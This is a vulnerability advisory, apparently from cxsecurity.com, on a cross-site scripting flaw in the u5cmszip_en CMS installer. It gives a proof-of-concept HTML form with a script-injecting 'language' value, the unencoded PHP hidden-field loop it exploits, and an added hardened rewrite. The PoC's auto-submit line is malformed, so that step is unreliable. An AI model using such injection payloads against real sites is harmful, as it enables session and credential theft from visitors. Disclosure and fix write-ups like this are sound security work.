u5cmszip_en Cms Cross Site Scripting

Published: 2016.12.28
Credit: Ashiyane Digital Security Team
Risk: Low
CWE: CWE-79
CVE: N/A
Local: No
Remote: Yes

|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|=============================================================|
|[+] Exploit Title: u5cmszip_en Cms Cross Site Scripting
|[+]
|[+] Exploit Author: Ashiyane Digital Security Team
|[+]
|[+] Vendor Homepage: http://yuba.ch/
|[+]
|[+] Download Link : http://yuba.ch/f.php?f=r/u5cmszip/u5cmszip_en.zip?t=1479045196
|[+]
|[+] Tested on: Kali Linux
|[+]
|[+] Date: 12 /27 / 2016
|=============================================================|
|[+] Exploit Code:

<html>
<head><title>Cross Site Scripting</title></head>
<body>
<form action="http://127.0.0.1/3/CMS/install/start.php" method="post" name="installation_step0">
<select name="language" class="language">
<option value="de">deutsch</option>
<option value="en" selected="selected">english</option>
<option value="es">spanish</option>
</select>
<input type="hidden" name="language" id="language" value="en'"()&%<acx><ScRiPt>alert(123)</ScRiPt>" />
</form>
<script language="Javascript">
setTimeout('http://127.0.0.1/3/CMS/install/start.php.submit()', 1);
</script>

</body>
</html>
============================================================
Vulnerable code :

<form action="step1.php" method="post" name="installation_step0">

<h4>Please choose a language | Bitte w&auml;hlen Sie eine Sprache | Porfavor elig&eacute; una idioma:</h4>

<select name="language" class="language">
<?php
$countries = shortTag_countries();
foreach ($countries as $country => $iso) {
print "<option value=\"{$iso}\"" . (strtolower($iso) == $http_lang? 'selected="selected"': '') . ">"
. htmlentities($country) . "</option>\n";
}
?>
</select>

<?php foreach ( $_POST as $key => $value ) { ?>
<?php if ( !strpos($key, 'password') ) { ?>
<input type="hidden" name="<?php echo $key ?>" id="<?php echo $key ?>" value="<?php echo $value ?>" />
<?php } } ?>

<input type="image" src="button_next.gif" alt="next" title="Next step" align="right" border="0" />

</form>

|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|[+] Discovered By : M.R.S.L.Y
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
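
The hidden-field loop in the vulnerable code above writes every POST key and value into HTML attributes without encoding, which is the CWE-79 sink. The following is an added example of a hardened version of that loop, not code from u5CMS or from the advisory author; the function names, the `ALLOWED_LANGUAGES` constant and the sample field names are assumptions made for illustration.

```php
<?php
// Added example, not u5CMS code: function and constant names are hypothetical.

// Language codes offered by the installer's <select> in the PoC above.
const ALLOWED_LANGUAGES = ['de', 'en', 'es'];

function h(string $s): string
{
    // ENT_QUOTES encodes both " and ', so a value cannot close the attribute.
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_hidden_fields(array $post): string
{
    $out = '';
    foreach ($post as $key => $value) {
        $key = (string) $key;
        // Keys land in name="" and id="" as well: allow only simple identifiers.
        if (!preg_match('/^[A-Za-z][A-Za-z0-9_]*$/', $key)) {
            continue;
        }
        // Array-valued input (field[]=x) would otherwise be printed as "Array".
        if (!is_string($value)) {
            continue;
        }
        // strpos() returns 0 when the key starts with "password", which the
        // original !strpos() test treats as "not found"; compare with false.
        if (stripos($key, 'password') !== false) {
            continue;
        }
        // Known fields get an allowlist check in addition to output encoding.
        if ($key === 'language' && !in_array($value, ALLOWED_LANGUAGES, true)) {
            continue;
        }
        $out .= sprintf(
            "<input type=\"hidden\" name=\"%s\" id=\"%s\" value=\"%s\" />\n",
            h($key), h($key), h($value)
        );
    }
    return $out;
}

// Constructed request body; field names are made up, the language value is
// the string used in the PoC above.
$post = [
    'language'       => 'en\'"()&%<acx><ScRiPt>alert(123)</ScRiPt>',
    'site_title'     => 'Tom\'s "demo" <site>',
    'password_admin' => 'secret',
];
echo render_hidden_fields($post);
```

With this input only `site_title` is emitted, with its quotes and angle brackets entity-encoded; the `language` value fails the allowlist and the password field is skipped.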



Copyright 2017, cxsecurity.com